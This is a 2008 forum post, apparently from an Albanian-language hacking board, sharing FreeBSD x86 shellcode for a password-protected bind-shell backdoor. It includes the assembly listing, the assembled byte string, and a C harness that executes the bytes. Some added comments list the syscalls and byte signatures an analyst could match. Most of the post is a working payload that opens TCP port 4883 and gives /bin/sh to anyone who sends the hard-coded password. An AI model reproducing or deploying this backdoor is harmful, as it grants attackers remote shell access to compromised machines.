
 freebsd/x86 portbind 4883 with auth shellcode

AutoriMesazh
El-Fuego



Numri i postimeve : 159
Join date : 12/06/2008
Age : 104
Location : Peja Morder City

MesazhTitulli: freebsd/x86 portbind 4883 with auth shellcode   Thu Jun 12, 2008 8:18 pm

/*
THE ZUGCODE - SMALL REMOTE 6ACKD0R
FreeBSD i386 bind shell with auth
code by MahDelin
Big thx SST [kaka, nolife, white]
Listens on TCP port 4883 and runs /bin/sh for a client that sends the expected password
*/

/*
void zugcode(void )
{
//socket
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("pushl $0x01");
__asm__("pushl $0x02");
__asm__("movl %esp, %ebp");
__asm__("pushl %ebp");
__asm__("movb $0x61, %al");
__asm__("int $0x80");

//struct sockaddr_in
__asm__("movl %eax, %edi");
__asm__("xorl %eax, %eax");
__asm__("movb $0x02, 9(%ebp)");
__asm__("movw $0x1313, 10(%ebp)");
__asm__("movl %eax, 12(%ebp)");
__asm__("leal 8(%ebp), %ecx");

//bind
__asm__("xor %ebx,%ebx");
__asm__("movb $0x10,%bl");
__asm__("push %ebx");
__asm__("push %ecx");
__asm__("push %edi");
__asm__("push %eax");
__asm__("movb $0x68, %al");
__asm__("int $0x80");

//listen
__asm__("xor %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl $0x01");
__asm__("pushl %edi");
__asm__("pushl %eax");
__asm__("movb $0x6a, %al");
__asm__("int $0x80");

//accept
__asm__("xor %eax, %eax");
__asm__("push %ebx");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("pushl %edi");
__asm__("pushl %eax");
__asm__("movb $0x1e, %al");
__asm__("int $0x80");

__asm__("mov %eax, %esi");
__asm__("xor %eax, %eax");
__asm__("pushl $0x203a7465");
__asm__("pushl $0x72636573");
__asm__("movl %esp, %ebx");
__asm__("push %eax");
__asm__("push $0x8");
__asm__("pushl %ebx");
__asm__("push %esi");
__asm__("xor %eax, %eax");
__asm__("push %eax");
__asm__("movb $0x65, %al");
__asm__("int $0x80");

//recv password
__asm__("xor %eax, %eax");
__asm__("pushl %ebp");
__asm__("movl %esp, %ebp");
__asm__("movb $0x20, %al");
__asm__("subl %eax, %esp");
__asm__("xor %eax, %eax");
__asm__("push %eax");
__asm__("mov $0x80, %al");
__asm__("push %eax");
__asm__("xor %eax, %eax");
__asm__("push %ebp");
__asm__("push %esi");
__asm__("push %eax");
__asm__("movb $0x66, %al");
__asm__("int $0x80");

//compare password
//save registers %esi, %edi
__asm__("mov %edi, %ebx");
__asm__("mov %esi, %edx");
__asm__("mov %eax, %ecx");
__asm__(".word 0x50eb");
__asm__("pop %esi");
__asm__("mov %ebp, %edi");
__asm__("repe cmpsb");
__asm__(".word 0x4275");
__asm__("mov %ebx, %edi");
__asm__("mov %edx, %esi");

//dup2 stdin
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");

//dup2 stdout
__asm__("xorl %eax, %eax");
__asm__("inc %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");

//dup2 stderr
__asm__("xorl %eax, %eax");
__asm__("add $0x2, %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");

// /bin/sh
__asm__("xor %ecx, %ecx");
__asm__("pushl %ecx");
__asm__("pushl $0x68732f2f");
__asm__("pushl $0x6e69622f");
__asm__("movl %esp, %ebx");
__asm__("pushl %ecx");
__asm__("pushl %ebx");
__asm__("movl %esp, %edx");
__asm__("pushl %ecx");
__asm__("pushl %edx");
__asm__("pushl %ebx");
__asm__("pushl %ecx");
__asm__("movb $0x3b, %al");
__asm__("int $0x80");

//exit
__asm__("xorl %eax, %eax");
__asm__("inc %eax");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("int $0x80");

__asm__(".byte 0xe8");
__asm__(".long 0xffffffab");
__asm__(".asciz \"payhash\12\"");
}
*/

/*
 * Assembled machine code for the routine shown in the commented-out
 * zugcode() listing: FreeBSD i386, syscalls issued through int $0x80 with
 * the number in %al.
 *
 * Sequence, as labelled in that listing:
 *   0x61 socket(AF_INET, SOCK_STREAM, 0)
 *   0x68 bind   - sin_family 2, port word 0x1313 (4883), address word 0,
 *                 i.e. the listener is not restricted to one interface
 *   0x6a listen - backlog 1
 *   0x1e accept
 *   0x65        - writes the 8 bytes "secr" "et: " to the accepted socket
 *                 (send in the FreeBSD syscall table - confirm)
 *   0x66 recv   - reads the reply (length argument 0x80)
 *   repe cmpsb  - compares the reply with the string stored after the
 *                 trailing call instruction; a mismatch jumps to exit
 *   0x5a dup2   - three times, accepted socket onto fds 0, 1 and 2
 *   0x3b execve - "/bin//sh"
 *   0x01 exit
 *
 * What an analyst can match on, all visible in the bytes below:
 *   - a TCP listener on port 4883 (\x66\xc7\x45\x0a\x13\x13)
 *   - the banner "secret: " sent right after accept
 *     (\x68\x65\x74\x3a\x20 / \x68\x73\x65\x63\x72)
 *   - the hard-coded comparison string "payhash\n" stored in clear as the
 *     last 8 bytes (\x70\x61\x79\x68\x61\x73\x68\x0a)
 *
 * No \x00 escape appears in the literal, so strlen() in main() runs to
 * the implicit terminator.
 */
unsigned char zug[] =
"\x31\xc0\x50\x50\x6a\x01\x6a\x02\x89\xe5\x55\xb0\x61\xcd\x80\x89\xc7\x31"
"\xc0\xc6\x45\x09\x02\x66\xc7\x45\x0a\x13\x13\x89\x45\x0c\x8d\x4d\x08\x31"
"\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xc0\x50\x6a\x01\x57\x50"
"\xb0\x6a\xcd\x80\x31\xc0\x53\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31"
"\xc0\x68\x65\x74\x3a\x20\x68\x73\x65\x63\x72\x89\xe3\x50\x6a\x08\x53\x56"
"\x31\xc0\x50\xb0\x65\xcd\x80\x31\xc0\x55\x89\xe5\xb0\x20\x29\xc4\x31\xc0"
"\x50\xb0\x80\x50\x31\xc0\x55\x56\x50\xb0\x66\xcd\x80\x89\xfb\x89\xf2\x89"
"\xc1\xeb\x50\x5e\x89\xef\xf3\xa6\x75\x42\x89\xdf\x89\xd6\x31\xc0\x50\x56"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x40\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31"
"\xc0\x83\xc0\x02\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31\xc9\x51\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe2\x51\x52\x53\x51"
"\xb0\x3b\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80\xe8\xab\xff\xff\xff\x70\x61"
"\x79\x68\x61\x73\x68\x0a";

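/*
 * Test harness: prints the payload length, then calls into zug[] as if it
 * were a function.
 *
 * zug[] is an initialized, writable data object. Where data pages are
 * mapped non-executable the call below faults instead of running the
 * payload.
 *
 * Returns 0 only if the called bytes return; the listing they were
 * assembled from ends in execve and exit syscalls.
 */
int main(void)
{
    int (*zugcode)(void);

    /*
     * strlen() returns size_t and takes a char pointer; the original passed
     * the size_t straight to %d and handed it an unsigned char array.
     * Both mismatches are resolved with explicit casts here.
     */
    printf("shellcode len, %d bytes\n", (int)strlen((const char *)zug));

    /* Object-to-function pointer cast: not ISO C, works only where the
     * platform treats the two pointer kinds alike. */
    zugcode = (int (*)(void))zug;
    zugcode();

    return 0;
}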